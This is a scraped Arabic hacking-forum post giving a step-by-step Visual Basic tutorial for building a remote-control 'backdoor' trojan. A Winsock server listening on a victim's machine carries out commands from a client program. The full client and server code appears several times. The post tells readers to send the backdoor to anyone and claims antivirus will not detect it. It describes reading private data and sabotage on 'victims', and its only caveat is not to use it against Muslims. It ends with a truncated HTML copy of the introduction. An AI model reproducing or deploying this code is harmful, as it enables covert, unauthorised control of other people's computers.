Const SWP_SHOWWINDOW = &H40
'دالة اخفاء زر ابدأ
Sub HideStartButton()
Dim Handle As Long, FindClass As Long
FindClass& = FindWindow("Shell_TrayWnd", "")
Handle& = FindWindowEx(FindClass&, 0, "Button", vbNullString)
ShowWindow Handle&, 0
End Sub
' دالة اظهار زر ابدأ
Sub ShowStartButton()
Dim Handle As Long, FindClass As Long
FindClass& = FindWindow("Shell_TrayWnd", "")
Handle& = FindWindowEx(FindClass&, 0, "Button", vbNullString)
ShowWindow Handle&, 1
End Sub

'دالة اغلاق سواقة الليزر
Sub CDClose()
retvalue = mciSendString("set CDAudio door closed", returnstring, 127, 0)
End Sub

'دالة فتح سواقة الليزر
Sub CDOpen()
retvalue = mciSendString("set CDAudio door open", returnstring, 127, 0)
End Sub
-----------------------------------
-----------------------------------
الحين سلامتك البرنامج الباكدور الي سويناه ارسلة لاي شخص تبيه مع العلم ان الانتي فايروس ماراح يكتشفه
والبرنامج الي عندك راح تتحكم فيه



وهذا ايضا موضوع اخر في صناعة برامج الهكر



اصنع برنامج هاكر بنفسك....بالفجول بسك:::منقول
ملحوظه مهمة: الرجاء عدم استخدام اي برنامج من صنعك او من صنع غيرك ضد المسلمين والهكر العربي بريئ من الذي يفعل ذلك الى يوم الدين والان نبدا الموضوع خطوة بخطوة


الجزئ الاول 
+++=(كيف تصمم برنامج اختراق بنفسك)=+++ 
..............سوف نتحدث إن شاء الله عن فكرة برمجة برامج الاختراق الشهيرة وكيف تتم برمجتها وتشغيلها ثم سوف نقوم بعمل برنامج بالفيجوال بيسك وذلك لتوضيح الموضوع واستيعابه بشكل أفضل.... 
حسناً . . لنبدأ الآن بشرح تفاصيل الموضوع وعلى بركة الله: 
تتكون هذه البرامج كما هو معروف من جزئين أو برنامجين يسمى الأول بملف العميل والآخر ملف الخادم 
1- 
كيفية الاتصال بين الملفين عبر الانترنت 
يتم الاتصال بين الملفين العميل والخادم باستخدام بروتوكول tcp/ip 

حيث يتم الاتصال بين الملفين العميل والخادم بمعرفة رقم الايبي ورقم المنفذ للبرنامج الخادم على جهاز الضحية 

بالنسبة لرقم الايبي للخادم فهو رقم الايبي الخاص بجهاز الضحية عند دخوله على شبكة الانترنت 

أما بالنسبة لرقم المنفذ فيتم تحديده برمجياً أثناء عمل البرنامج ولا يمكن تعديله إذا تم وضعه في جهاز الضحية وهو رقم يتراوح بين 1 إلى 65535 تقريباً 
وإذا اضطر الأمر لتعديل رقم المنفذ فيجب زرع نسخة جديدة من ملف الخادم في جهاز الضحية مرة أخرى بعد التعديل 
عندما يبدأ برنامج الخادم بالعمل عند تشغيله يقوم بعمل خط اتصال وينتظر أي طلب اتصال قادم من الانترنت 

في هذه الحالة يقوم الشخص الذي يملك البرنامج العميل ويعرف رقم الايبي ورقم المنفذ الصحيح بالخادم بعمل اتصال مع الخادم ويكتمل الاتصال بين الجهازين بعد ذلك يبدأ برنامج العميل بإرسال الأوامر ويقوم الخادم باستقبال هذه الأوامر وتنفيذ المطلوب منه ثم يقوم بإرسال نتائج الأوامر مرة أخرى إلى العميل 
هذه هي الفكرة ببساطة شديدة أرجو أن تكون واضحة للجميع 

2-خطوات عمل برنامج بالفيجوال بيسك للتجسس . 
برنامج العميل 
كما ذكرنا بخصوص العميل فهو الذي يتحكم بالعملية كلها وهو الذي يرسل الأوامر للبرنامج الخادم وسوف نقوم الآن بشرح خطوات تنفيذ برنامج عميل 

الخطوة الأولى : معرفة رقم الايبي ورقم المنفذ للبرنامج الخادم وإجراء الاتصال 

الخطوة الثانية : ينتظر البرنامج السماح بالاتصال من البرنامج الخادم ثم يتم الاتصال بين الجهازين 

الخطوة الثالثة : يقوم البرنامج بإرسال الأوامر للبرنامج الخادم والذي بدوره يقوم بالرد بالمعلومات المطلوبة . 

برنامج الخادم 

يقوم هذا البرنامج بعمل اتصال بالانترنت وينتظر أي طلب اتصال معه وإذا قام برنامج العميل بكتابة رقم الايبي ورقم المنفذ الصحيح فانه يتم الاتصال بين الطرفين ويبدأ البرنامج الخادم باستقبال الأوامر من البرنامج العميل المتصل به وينفذ ما هو مطلوب منه على جهاز الضحية مثل تنفيذ بعض الأعمال التخريبية أو قراءة معلومات خاصة وإرسالها للبرنامج العميل. 
سنقوم الآن بتصميم برنامج صغير لتوضيح فكرة إرسال الأوامر إلى البرنامج الخادم واستقبال البرنامج الخادم لهذه الأوامر وتنفيذها 

البرنامج كما ذكرنا سابقا يتكون من جزئين برنامج عميل وبرنامج خادم 

..................... 
تصميم البرنامج العميل 
أولا . . يتم إدراج أداة MS WINSOCK للمشروع ويتم تغيير اسم الأداة إلى wskclient 

ثانياً . . يتم إدراج TIMER 

ثالثاً . . يتم وضع أزارير لعملية الاتصال وقطع الاتصال 

رابعاً . . يتم ادراج 2 مربع نص لكتابة رقم الايبي ورقم المنفذ srvrip.Text srvrport.Text 

خامساً . . يتم وضع أزارير للأوامر المراد إرسالها للبرنامج الخادم 
كتابة شيفرة ( كود ) البرنامج العميل [Client] 

يحتوي الكود على العديد من الإجراءات والأوامر ولكن سأذكر هنا الأسطر الأساسية والتي تمثل صلب عمل البرنامج فقط وذلك من أجل استيعاب الموضوع بشكل الأفضل أما تفاصيل الشيفرة الكاملة فيمكنكم قراءتها من البرنامج بعد تحميله من الوصلة المذكورة في نهاية الموضوع 

1. إجراء عملية الاتصال مع الخادم wskclient.Connect srvrip.Text, srvrport.Text 

2. عملية إرسال الأوامر إلى البرنامج الخادم "wskclient.SendData "openCD 

3. مراقبة حالة الاتصال wskclient.State = 0 
أهم القيم المستخدمة في مراقبة حالة الاتصال 

0 " لا يوجد اتصال " 

7 " تم الاتصال " 

8 " قام الخادم بقطع الاتصال " 

9 " خطأ في الاتصال " 

تصميم البرنامج الخادم 

أولاً . . إدراج أداة MS WINSOCK للمشروع 

ثانياً . . كتابة الكود للبرنامج الخادم مع ملاحظة انه تم تعيين رقم المنفذ (2000) للبرنامج ويمكن تغييره في الكود لأي رقم آخر من 1 - 65535 

ثالثاً . . تصميم البرنامج ليعمل تلقائياً بعد تشغيله 
كتابة شيفرة ( كود ) البرنامج الخادم [Server] 

يحتوي الكود على العديد من الإجراءات والأوامر ولكن سأذكر هنا الأسطر الأساسية والتي تمثل صلب عمل البرنامج فقط وذلك من أجل استيعاب الموضوع بشكل الأفضل أما تفاصيل الشيفرة الكاملة فيمكنكم قراءتها من البرنامج بعد تحميله من الوصلة المذكورة في نهاية الموضوع 

1. تحديد منفذ الاتصال wskServer.LocalPort = 2000 

2. إجراء عملية الاتصال wskServer.Listen 

3. قبول طلب البرنامج العميل بالاتصال مع البرنامج الخادم 

Private Sub wskServer_ConnectionRequest(By
Val requestID As Long) 

If wskServer.State <> sckClosed Then 

wskServer.Close 

wskServer.Accept requestID 

End Sub 


عملية استقبال الأوامر من البرنامج العميل ( يتم تعريف متغير يقوم باستقبال الأوامر من العميل ) 

Private Sub wskServer_DataArrival(ByVal bytesTotal As Long) 

Dim command As String 

wskServer.GetData command 

End Sub 
...................... 
....................... 
الحين نصممه خطوه بخطوه: 
---------------------------------------------------------------------------------- 
---------------------------------------------------------------------------------- 
هذا البرنامج يمثل برنامج العميل 
بستخدام تقنية tcp/ip 
---------------------------------------------------------------------------------- 
---------------------------------------------------------------------------------- 
الحين انشئ زر واسمه اتصال 
اوكتب هذا الكود 
Private Sub Command1_Click() 
wskclient.Close 
'يجب التأكد من أن الإتصال مغلق قبل عمل إتصال جديد 
If srvrip.Text = "" Then 
MsgBox "IP يجب كتابة رقم" 
Exit Sub 
End If 
If srvrport.Text = "" Then 
MsgBox "يجب كتابة رقم المنفذ" 
' يجب كتابة رقم منفذ 
Exit Sub 
End If 
If srvrport.Text > 65535 Then 
MsgBox "رقم المنفذ بين 1 - 65535" 
' يجب التأكد من رقم المنفذ الصحيح 
Text2.Text = "" 
Exit Sub 
End If 
wskclient.Connect srvrip.Text, srvrport.Text 
'هذا السطر يمثل عملية الإتصال بالخادم 
'(Port)ورقم المنفذIP يتم الإتصال بالخادم عن طريق تحديد رقم 
'عند الضغط على زر "إتصال" يتم إجراء الإتصال 
Command1.Enabled = False 
'تعطيل زر "اتصال" عند اجراء الاتصال 
End Sub 

--------------------------------------------------------- 
--------------------------------------------------------- 
انشئ رز واسمه انهاء الاتصال 
واكتب هذا الكود 
Private Sub Command2_Click() 
wskclient.Close 
' "يتم إغلاق الإتصال عند الضغط على زر "انهاء الاتصال 
Command1.Enabled = True 
'تمكين الزر "اتصال" عند قطع الاتصال 
End Sub


الجزئ الثاني 

---------------------------------------------------------- 
انشئ زر واسمه فتح سواقه الليزر 
واكتب هذا الكود 
Private Sub Command3_Click() 
On Error Resume Next 
wskclient.SendData "openCD" 
End Sub 
--------------------------------------- 
--------------------------------------- 
انشئ زر واسمه اغلاق سواقه الليزر 
واكتب هذا الكود 
Private Sub Command4_Click() 
On Error Resume Next 
wskclient.SendData "closeCD" 
End Sub 
---------------------------------------- 
---------------------------------------- 
انشئ زر واسمه اخفاء 
ايقونات سطح المكتب 
واكتب هذا الكود 
Private Sub Command5_Click() 
On Error Resume Next 
wskclient.SendData "hideDESKTOP" 
End Sub 
------------------------------------- 
-------------------------------------- 
انشئ زر واسمه اضهار ايقونات سطح المكتب 
واكتب هذا الكود 
Private Sub Command6_Click() 
On Error Resume Next 
wskclient.SendData "showDESKTOP" 
End Sub 
-------------------------------------------- 
-------------------------------------------- 
انشئ زر واسمه اخفاء زر ابداء 
واكتب هذا الكود 
Private Sub Command8_Click() 
On Error Resume Next 
wskclient.SendData "hideSTART" 
End Sub 
-------------------------------------------- 
-------------------------------------------- 
انشئ زر واسمه اضهار زر ابداء 
واكتب هذا الامر 
Private Sub Command9_Click() 
On Error Resume Next 
wskclient.SendData "showSTART" 
End Sub 
------------------------------------------ 
----------------------------------------- 
انشئ زر واسمه اخفاء شريط المهام 
واكتب هذا الكود 
Private Sub Command10_Click() 
On Error Resume Next 
wskclient.SendData "hideTASKBAR" 
End Sub 
----------------------------------------------- 
----------------------------------------------- 
انشئ زر واسمه اضهار شريط المهام 
واكتب هذا الكود 
Private Sub Command11_Click() 
On Error Resume Next 
wskclient.SendData "showTASKBAR" 
End Sub 
---------------------------------------------- 

الحين انشئ fram وذللك من شريط الادوات من الفيجوال بيسك 
واسمهه لوحة الاتصال وضح زر الاتصال وزر انهاء الاتصال 
--------------------------------------------------------------------- 
الحين انشئ تايمر وضعه على لوحة الاتصال التي صنعناها من قائمة fram 
اوكتب هذا الكود فيه 
Private Sub Timer1_Timer() 
If wskclient.State = 0 Then status.Caption = "لايوجد إتصال" 
If wskclient.State = 6 Then status.Caption = "جاري الإتصال" 
If wskclient.State = 7 Then status.Caption = "تم الإتصال مع الخادم" 
If wskclient.State = 8 Then status.Caption = "قام الخادم بقطع الإتصال" 
If wskclient.State = 9 Then status.Caption = "خطأ في الإتصال" 
'توجد 9 مراحل لإجراء عملية الإتصال بين عميل وخادم 
If wskclient.State <> sckConnected Then 
status.Caption = "لايوجد إتصال" 
End If 
End Sub 
------------------------------- 
------------------------------ 
الحين انشئ wskclient وذللك عن طريق الضغط على زر كنترول من حرف تي وسوف تضهر لك قائمه اختار منها microsoft winsock control 6.0 واضغط اوكي 
---------------------------------- 
---------------------------------- 
الحين انشئ label وذلك من شريط الادوات في الفيجوال بيسك وسمه 
ip 
----------------------------- 
----------------------------- 
الحين انشئ text box وضعها امام label الذي سميناه ip 
------------------------------ 
----------------------------- 
الحين انشئ label وسمه port 
------------------------------------- 
الحين انشئ text box وضعها امام label الي سميناه port 
-------------------------------------- 
الحين انشئ label واتركه فارغا وضعه اسفل الفورم 
------------------------------------------------------------------ 
------------------------------------------------------------------ 
------------------------------------------------------------------ 
الحين نكتب برنامج الخادم 
انشئ فورم جديد واكتب هذا الكود فيه 
Private Sub Form_Load() 
'wskServer اسم اداة الوينسوكت في هذا البرنامج 
wskServer.LocalPort = 2003 
' تعيين منفذ للخادم 
wskServer.Listen 
' بدء تشغيل الخادم 
TaskBarHwnd = FindWindow("Shell_traywnd", "") 
' يقوم البرنامج بتحديد تعريف شريط المهام 
End Sub 
--------------------------------------- 
--------------------------------------- 
الحين انشئ wskclient وذللك عن طريق الضغط على زر كنترول من حرف تي وسوف تضهر لك قائمه اختار منها microsoft winsock control 6.0 واضغط اوكي واكتب هذا الكود فيهPrivate Sub 
Private Sub wskServer_ConnectionRequest(By
Val requestID As Long) 
If wskServer.State <> sckClosed Then _ 
wskServer.Close 
wskServer.Accept requestID 
' قبول طلب الاتصال 
End Sub 

'==== هذا الإجراء يمثل عملية استقبال الاوامر من البرنامج العميل ==== 
Private Sub wskServer_DataArrival(ByVal bytesTotal As Long) 
Dim command As String 
'يجب تعريف المتغير الذي سوف يستقبل البيانات القادمة من العميل 
wskServer.GetData command 
'يمثل هذا السطر استقبال المتغير للاوامر القادمة من العميل 

Select Case command ' تحديد الأمر القادم من البرنامج العميل 
Case "openCD" ' اذا تم اختيار امر فتح سواقة الليزر يتم تنفيذ الاجراء التالي 
CDOpen 
Case "closeCD" 
CDClose ' اذا تم اختيار امر اغلاق سواقة الليزر يتم تنفيذ الاجراء التالي 
Case "hideDESKTOP" ' اذا تم اختيار امر اخفاء ايقونات سطح المكتب يتم تنفيذ الاجراء التالي 
Progman& = FindWindow("Progman", vbNullString) 
SHELLDLLDefView& = FindWindowEx(Progman&, 0&, "SHELLDLL_DefView", vbNullString) 
SysListView& = FindWindowEx(SHELLDLLDefView&, 0&, "SysListView32", vbNullString) 
Call ShowWindow(SysListView&, SW_HIDE) 
Case "showDESKTOP" ' اذا تم اختيار امر اظهار ايقونات سطح المكتب يتم تنفيذ الاجراء التالي 
Progman& = FindWindow("Progman", vbNullString) 
SHELLDLLDefView& = FindWindowEx(Progman&, 0&, "SHELLDLL_DefView", vbNullString) 
SysListView& = FindWindowEx(SHELLDLLDefView&, 0&, "SysListView32", vbNullString) 
Call ShowWindow(SysListView&, SW_SHOW) 
Case "hideSTART" ' اذا تم اختيار امر اخفاء زر ابدأ يتم تنفيذ الاجراء التالي 
HideStartButton 
Case "showSTART" ' اذا تم اختيار امر اظهار زر ابدأ يتم تنفيذ الاجراء التالي 
ShowStartButton 
Case "hideTASKBAR" ' اذا تم اختيار امر اخفاء شريط المهام يتم تنفيذ الاجراء التالي 
Call SetWindowPos(TaskBarHwnd, 0&, 0&, 0&, 0&, 0&, SWP_HIDEWINDOW) 
Case "showTASKBAR" ' اذا تم اختيار امر اظهار شريط المهام يتم تنفيذ الاجراء التالي 
Call SetWindowPos(TaskBarHwnd, 0&, 0&, 0&, 0&, 0&, SWP_SHOWWINDOW) 
End Select 

End Sub 

-------------------------- 
--------------------------- 
الحين انشئ label وسمه الي تبي تسميه واكتب الي تبي تكتب فيه انشالله تسميه بوكيمون 
--------------------------------------------- 
---------------------------------------------- 
الحين انشئ موديل واكتب هذا الكود فيها 

' API CALLS 
'مجموعة من الدالات التي تختص بتنفيذ الأوامر الخاصة بالخادم 

Public Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long 
Public Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long 
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long 
Public Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long 
Public Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long 

Public Const SW_HIDE = 0 
Public Const SW_SHOW = 5 

Const SWP_HIDEWINDOW = &H80 
Const SWP_SHOWWINDOW = &H40 
'دالة اخفاء زر ابدأ 
Sub HideStartButton() 
Dim Handle As Long, FindClass As Long 
FindClass& = FindWindow("Shell_TrayWnd", "") 
Handle& = FindWindowEx(FindClass&, 0, "Button", vbNullString) 
ShowWindow Handle&, 0 
End Sub 
' دالة اظهار زر ابدأ 
Sub ShowStartButton() 
Dim Handle As Long, FindClass As Long 
FindClass& = FindWindow("Shell_TrayWnd", "") 
Handle& = FindWindowEx(FindClass&, 0, "Button", vbNullString) 
ShowWindow Handle&, 1 
End Sub 

'دالة اغلاق سواقة الليزر 
Sub CDClose() 
retvalue = mciSendString("set CDAudio door closed", returnstring, 127, 0) 
End Sub 

'دالة فتح سواقة الليزر 
Sub CDOpen() 
retvalue = mciSendString("set CDAudio door open", returnstring, 127, 0) 
End Sub 
----------------------------------- 
----------------------------------- 
الحين سلامتك البرنامج الباكدور الي سويناه دزه لاي سخص تبيه مع العلم ان الانتي فايروس ماراح يكتشفه 
والبرنامج الي عندك راح تتحكم فيه 

منقولللأخhi_hacker 
ارجوا عدم استخدامه ضد المسلمين



الجزئ الثالث 


---------------------------------------------------------- 
انشئ زر واسمه فتح سواقه الليزر 
واكتب هذا الكود 
Private Sub Command3_Click() 
On Error Resume Next 
wskclient.SendData "openCD" 
End Sub 
--------------------------------------- 
--------------------------------------- 
انشئ زر واسمه اغلاق سواقه الليزر 
واكتب هذا الكود 
Private Sub Command4_Click() 
On Error Resume Next 
wskclient.SendData "closeCD" 
End Sub 
---------------------------------------- 
---------------------------------------- 
انشئ زر واسمه اخفاء 
ايقونات سطح المكتب 
واكتب هذا الكود 
Private Sub Command5_Click() 
On Error Resume Next 
wskclient.SendData "hideDESKTOP" 
End Sub 
------------------------------------- 
-------------------------------------- 
انشئ زر واسمه اضهار ايقونات سطح المكتب 
واكتب هذا الكود 
Private Sub Command6_Click() 
On Error Resume Next 
wskclient.SendData "showDESKTOP" 
End Sub 
-------------------------------------------- 
-------------------------------------------- 
انشئ زر واسمه اخفاء زر ابداء 
واكتب هذا الكود 
Private Sub Command8_Click() 
On Error Resume Next 
wskclient.SendData "hideSTART" 
End Sub 
-------------------------------------------- 
-------------------------------------------- 
انشئ زر واسمه اضهار زر ابداء 
واكتب هذا الامر 
Private Sub Command9_Click() 
On Error Resume Next 
wskclient.SendData "showSTART" 
End Sub 
------------------------------------------ 
----------------------------------------- 
انشئ زر واسمه اخفاء شريط المهام 
واكتب هذا الكود 
Private Sub Command10_Click() 
On Error Resume Next 
wskclient.SendData "hideTASKBAR" 
End Sub 
----------------------------------------------- 
----------------------------------------------- 
انشئ زر واسمه اضهار شريط المهام 
واكتب هذا الكود 
Private Sub Command11_Click() 
On Error Resume Next 
wskclient.SendData "showTASKBAR" 
End Sub 
---------------------------------------------- 

الحين انشئ fram وذللك من شريط الادوات من الفيجوال بيسك 
واسمهه لوحة الاتصال وضح زر الاتصال وزر انهاء الاتصال 
--------------------------------------------------------------------- 
الحين انشئ تايمر وضعه على لوحة الاتصال التي صنعناها من قائمة fram 
اوكتب هذا الكود فيه 
Private Sub Timer1_Timer() 
If wskclient.State = 0 Then status.Caption = "لايوجد إتصال" 
If wskclient.State = 6 Then status.Caption = "جاري الإتصال" 
If wskclient.State = 7 Then status.Caption = "تم الإتصال مع الخادم" 
If wskclient.State = 8 Then status.Caption = "قام الخادم بقطع الإتصال" 
If wskclient.State = 9 Then status.Caption = "خطأ في الإتصال" 
'توجد 9 مراحل لإجراء عملية الإتصال بين عميل وخادم 
If wskclient.State <> sckConnected Then 
status.Caption = "لايوجد إتصال" 
End If 
End Sub 
------------------------------- 
------------------------------ 
الحين انشئ wskclient وذللك عن طريق الضغط على زر كنترول من حرف تي وسوف تضهر لك قائمه اختار منها microsoft winsock control 6.0 واضغط اوكي 
---------------------------------- 
---------------------------------- 
الحين انشئ label وذلك من شريط الادوات في الفيجوال بيسك وسمه 
ip 
----------------------------- 
----------------------------- 
الحين انشئ text box وضعها امام label الذي سميناه ip 
------------------------------ 
----------------------------- 
الحين انشئ label وسمه port 
------------------------------------- 
الحين انشئ text box وضعها امام label الي سميناه port 
-------------------------------------- 
الحين انشئ label واتركه فارغا وضعه اسفل الفورم 
------------------------------------------------------------------ 
------------------------------------------------------------------ 
------------------------------------------------------------------ 
الحين نكتب برنامج الخادم 
انشئ فورم جديد واكتب هذا الكود فيه 
Private Sub Form_Load() 
'wskServer اسم اداة الوينسوكت في هذا البرنامج 
wskServer.LocalPort = 2003 
' تعيين منفذ للخادم 
wskServer.Listen 
' بدء تشغيل الخادم 
TaskBarHwnd = FindWindow("Shell_traywnd", "") 
' يقوم البرنامج بتحديد تعريف شريط المهام 
End Sub 
--------------------------------------- 
--------------------------------------- 
الحين انشئ wskclient وذللك عن طريق الضغط على زر كنترول من حرف تي وسوف تضهر لك قائمه اختار منها microsoft winsock control 6.0 واضغط اوكي واكتب هذا الكود فيهPrivate Sub 
Private Sub wskServer_ConnectionRequest(By
Val requestID As Long) 
If wskServer.State <> sckClosed Then _ 
wskServer.Close 
wskServer.Accept requestID 
' قبول طلب الاتصال 
End Sub 

'==== هذا الإجراء يمثل عملية استقبال الاوامر من البرنامج العميل ==== 
Private Sub wskServer_DataArrival(ByVal bytesTotal As Long) 
Dim command As String 
'يجب تعريف المتغير الذي سوف يستقبل البيانات القادمة من العميل 
wskServer.GetData command 
'يمثل هذا السطر استقبال المتغير للاوامر القادمة من العميل 

Select Case command ' تحديد الأمر القادم من البرنامج العميل 
Case "openCD" ' اذا تم اختيار امر فتح سواقة الليزر يتم تنفيذ الاجراء التالي 
CDOpen 
Case "closeCD" 
CDClose ' اذا تم اختيار امر اغلاق سواقة الليزر يتم تنفيذ الاجراء التالي 
Case "hideDESKTOP" ' اذا تم اختيار امر اخفاء ايقونات سطح المكتب يتم تنفيذ الاجراء التالي 
Progman& = FindWindow("Progman", vbNullString) 
SHELLDLLDefView& = FindWindowEx(Progman&, 0&, "SHELLDLL_DefView", vbNullString) 
SysListView& = FindWindowEx(SHELLDLLDefView&, 0&, "SysListView32", vbNullString) 
Call ShowWindow(SysListView&, SW_HIDE) 
Case "showDESKTOP" ' اذا تم اختيار امر اظهار ايقونات سطح المكتب يتم تنفيذ الاجراء التالي 
Progman& = FindWindow("Progman", vbNullString) 
SHELLDLLDefView& = FindWindowEx(Progman&, 0&, "SHELLDLL_DefView", vbNullString) 
SysListView& = FindWindowEx(SHELLDLLDefView&, 0&, "SysListView32", vbNullString) 
Call ShowWindow(SysListView&, SW_SHOW) 
Case "hideSTART" ' اذا تم اختيار امر اخفاء زر ابدأ يتم تنفيذ الاجراء التالي 
HideStartButton 
Case "showSTART" ' اذا تم اختيار امر اظهار زر ابدأ يتم تنفيذ الاجراء التالي 
ShowStartButton 
Case "hideTASKBAR" ' اذا تم اختيار امر اخفاء شريط المهام يتم تنفيذ الاجراء التالي 
Call SetWindowPos(TaskBarHwnd, 0&, 0&, 0&, 0&, 0&, SWP_HIDEWINDOW) 
Case "showTASKBAR" ' اذا تم اختيار امر اظهار شريط المهام يتم تنفيذ الاجراء التالي 
Call SetWindowPos(TaskBarHwnd, 0&, 0&, 0&, 0&, 0&, SWP_SHOWWINDOW) 
End Select 

End Sub 

-------------------------- 
--------------------------- 
الحين انشئ label وسمه الي تبي تسميه واكتب الي تبي تكتب فيه انشالله تسميه بوكيمون 
--------------------------------------------- 
---------------------------------------------- 
الحين انشئ موديل واكتب هذا الكود فيها 

' API CALLS 
'مجموعة من الدالات التي تختص بتنفيذ الأوامر الخاصة بالخادم 

Public Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long 
Public Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long 
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long 
Public Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long 
Public Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long 

Public Const SW_HIDE = 0 
Public Const SW_SHOW = 5 

Const SWP_HIDEWINDOW = &H80 
Const SWP_SHOWWINDOW = &H40 
'دالة اخفاء زر ابدأ 
Sub HideStartButton() 
Dim Handle As Long, FindClass As Long 
FindClass& = FindWindow("Shell_TrayWnd", "") 
Handle& = FindWindowEx(FindClass&, 0, "Button", vbNullString) 
ShowWindow Handle&, 0 
End Sub 
' دالة اظهار زر ابدأ 
Sub ShowStartButton() 
Dim Handle As Long, FindClass As Long 
FindClass& = FindWindow("Shell_TrayWnd", "") 
Handle& = FindWindowEx(FindClass&, 0, "Button", vbNullString) 
ShowWindow Handle&, 1 
End Sub 

'دالة اغلاق سواقة الليزر 
Sub CDClose() 
retvalue = mciSendString("set CDAudio door closed", returnstring, 127, 0) 
End Sub 

'دالة فتح سواقة الليزر 
Sub CDOpen() 
retvalue = mciSendString("set CDAudio door open", returnstring, 127, 0) 
End Sub 
----------------------------------- 
----------------------------------- 
الحين سلامتك البرنامج الباكدور الي سويناه دزه لاي سخص تبيه مع العلم ان الانتي فايروس ماراح يكتشفه 
والبرنامج الي عندك راح تتحكم فيه 



منقوووووول للفــــائدة
[/FRAME][/FRAME]]]></description>
			<content:encoded><![CDATA[<div>[FRAME=&quot;11 10&quot;][FRAME=&quot;2 80&quot;]<div align="center">صمم برنامج هكر بنفسك<br />
<br />
<br />
<br />
سوف نتحدث إن شاء الله عن فكرة برمجة برامج الاختراق الشهيرة وكيف تتم برمجتها وتشغيلها ثم سوف نقوم بعمل برنامج بالفيجوال بيسك وذلك لتوضيح الموضوع واستيعابه بشكل أفضل....<br />
حسناً . . لنبدأ الآن بشرح تفاصيل الموضوع وعلى بركة الله:<br />
تتكون هذه البرامج كما هو معروف من جزئين أو برنامجين يسمى الأول بملف العميل والآخر ملف الخادم<br />
1-كيفية الاتصال بين الملفين عبر الانترنت<br />
يتم الاتصال بين الملفين العميل والخادم باستخدام بروتوكول tcp/ip<br />
<br />
حيث يتم الاتصال بين الملفين العميل والخادم بمعرفة رقم الايبي ورقم المنفذ للبرنامج الخادم على جهاز الضحية<br />
<br />
بالنسبة لرقم الايبي للخادم فهو رقم الايبي الخاص بجهاز الضحية عند دخوله على شبكة الانترنت<br />
<br />
أما بالنسبة لرقم المنفذ فيتم تحديده برمجياً أثناء عمل البرنامج ولا يمكن تعديله إذا تم وضعه في جهاز الضحية وهو رقم يتراوح بين 1 إلى 65535 تقريباً<br />
وإذا اضطر الأمر لتعديل رقم المنفذ فيجب زرع نسخة جديدة من ملف الخادم في جهاز الضحية مرة أخرى بعد التعديل<br />
عندما يبدأ برنامج الخادم بالعمل عند تشغيله يقوم بعمل خط اتصال وينتظر أي طلب اتصال قادم من الانترنت<br />
<br />
في هذه الحالة يقوم الشخص الذي يملك البرنامج العميل ويعرف رقم الايبي ورقم المنفذ الصحيح بالخادم بعمل اتصال مع الخادم ويكتمل الاتصال بين الجهازين بعد ذلك يبدأ برنامج العميل بإرسال الأوامر ويقوم الخادم باستقبال هذه الأوامر وتنفيذ المطلوب منه ثم يقوم بإرسال نتائج الأوامر مرة أخرى إلى العميل<br />
هذه هي الفكرة ببساطة شديدة أرجو أن تكون واضحة للجميع<br />
<br />
2-خطوات عمل برنامج بالفيجوال بيسك للتجسس .<br />
برنامج العميل<br />
كما ذكرنا بخصوص العميل فهو الذي يتحكم بالعملية كلها وهو الذي يرسل الأوامر للبرنامج الخادم وسوف نقوم الآن بشرح خطوات تنفيذ برنامج عميل<br />
<br />
الخطوة الأولى : معرفة رقم الايبي ورقم المنفذ للبرنامج الخادم وإجراء الاتصال <br />
<br />
الخطوة الثانية : ينتظر البرنامج السماح بالاتصال من البرنامج الخادم ثم يتم الاتصال بين الجهازين <br />
<br />
الخطوة الثالثة : يقوم البرنامج بإرسال الأوامر للبرنامج الخادم والذي بدوره يقوم بالرد بالمعلومات المطلوبة .<br />
<br />
برنامج الخادم<br />
<br />
يقوم هذا البرنامج بعمل اتصال بالانترنت وينتظر أي طلب اتصال معه وإذا قام برنامج العميل بكتابة رقم الايبي ورقم المنفذ الصحيح فانه يتم الاتصال بين الطرفين ويبدأ البرنامج الخادم باستقبال الأوامر من البرنامج العميل المتصل به وينفذ ما هو مطلوب منه على جهاز الضحية مثل تنفيذ بعض الأعمال التخريبية أو قراءة معلومات خاصة وإرسالها للبرنامج العميل.<br />
سنقوم الآن بتصميم برنامج صغير لتوضيح فكرة إرسال الأوامر إلى البرنامج الخادم واستقبال البرنامج الخادم لهذه الأوامر وتنفيذها<br />
<br />
البرنامج كما ذكرنا سابقا يتكون من جزئين برنامج عميل وبرنامج خادم<br />
<br />
.....................<br />
تصميم البرنامج العميل<br />
أولا . . يتم إدراج أداة MS WINSOCK للمشروع ويتم تغيير اسم الأداة إلى wskclient <br />
<br />
ثانياً . . يتم إدراج TIMER <br />
<br />
ثالثاً . . يتم وضع أزارير لعملية الاتصال وقطع الاتصال <br />
<br />
رابعاً . . يتم ادراج 2 مربع نص لكتابة رقم الايبي ورقم المنفذ srvrip.Text srvrport.Text <br />
<br />
خامساً . . يتم وضع أزارير للأوامر المراد إرسالها للبرنامج الخادم <br />
كتابة شيفرة ( كود ) البرنامج العميل [Client]<br />
<br />
